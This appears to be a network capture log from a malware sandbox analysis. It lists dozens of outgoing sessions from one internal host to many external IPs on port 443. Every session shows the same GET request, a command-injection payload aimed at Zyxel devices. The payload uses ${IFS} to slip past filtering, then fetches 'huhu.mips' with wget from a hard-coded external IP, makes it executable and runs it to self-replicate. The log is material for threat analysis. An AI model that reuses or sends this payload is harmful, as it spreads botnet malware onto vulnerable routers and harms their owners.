                                      Jan 19, 2024 17:29:48.093741894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8254192.168.2.1447594147.81.106.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093770981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8255192.168.2.1456668184.169.33.136443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093803883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8256192.168.2.1450028211.15.199.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093847036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8257192.168.2.1436738220.204.72.192443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093883038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8258192.168.2.1457358176.235.97.243443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093924046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8259192.168.2.144335853.192.24.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.093965054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8260192.168.2.14458362.135.52.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094022989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8261192.168.2.144011062.59.72.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094058990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8262192.168.2.143854449.21.132.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094099045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8263192.168.2.1436384142.93.61.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094145060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8264192.168.2.1446574142.80.143.156443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094180107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8265192.168.2.1453284184.240.211.178443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094199896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8266192.168.2.143420266.221.223.172443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094238997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8267192.168.2.1441640106.84.48.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094310999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8268192.168.2.1443630100.240.225.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094357014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8269192.168.2.144766851.141.146.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094388962 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8270192.168.2.145987266.68.200.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094451904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8271192.168.2.1434474110.145.0.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094455004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8272192.168.2.1446082203.136.96.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094476938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8273192.168.2.1457690213.152.71.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094511032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8274192.168.2.145736448.3.49.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094543934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8275192.168.2.1452546194.194.139.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094594955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8276192.168.2.1451232144.210.54.236443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094619989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8277192.168.2.1439384196.84.156.239443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094672918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8278192.168.2.1459952147.106.71.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094702005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8279192.168.2.1436850143.83.194.177443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094750881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8280192.168.2.1451806207.212.34.111443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094794989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8281192.168.2.145950087.108.131.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094850063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8282192.168.2.1439876112.206.8.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094891071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8283192.168.2.1460778154.216.241.183443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094933033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8284192.168.2.144851446.147.241.91443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094959021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8285192.168.2.1454076105.221.22.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.094989061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8286192.168.2.1442828106.94.153.40443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095027924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8287192.168.2.143391247.16.1.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095092058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8288192.168.2.1447212218.100.61.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095119953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8289192.168.2.145678270.54.4.126443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095140934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8290192.168.2.1455176194.198.36.146443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095199108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8291192.168.2.143943666.88.197.204443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095216990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8292192.168.2.1458848135.217.216.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095277071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8293192.168.2.1433128122.20.17.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095298052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8294192.168.2.1457292115.131.6.181443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095340967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8295192.168.2.145994873.125.142.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095385075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8296192.168.2.143539858.191.216.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095411062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8297192.168.2.143555061.247.210.179443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095448017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8298192.168.2.1453188203.144.53.106443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095518112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8299192.168.2.1449690213.121.80.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095535040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8300192.168.2.1445010134.118.177.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095556021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8301192.168.2.1452114218.15.185.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095614910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8302192.168.2.144391635.160.55.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095654964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8303192.168.2.145441035.165.135.7443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095707893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8304192.168.2.1450162201.133.163.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095774889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8305192.168.2.1453410196.185.221.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095796108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8306192.168.2.145551094.157.43.34443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095828056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8307192.168.2.1443722181.126.200.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095879078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8308192.168.2.1455078220.96.131.159443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095927000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8309192.168.2.1446904146.34.93.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.095979929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8310192.168.2.144688658.253.162.232443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096014023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8311192.168.2.1443756136.203.37.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096046925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8312192.168.2.1444468111.219.17.150443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096051931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8313192.168.2.145973483.162.153.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096091032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8314192.168.2.1451136119.138.232.46443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096170902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8315192.168.2.1454056199.78.144.55443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096193075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8316192.168.2.144489670.107.92.104443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:48.096235037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8317192.168.2.1444842218.151.26.202443
                                      TimestampBytes transferredDirectionData
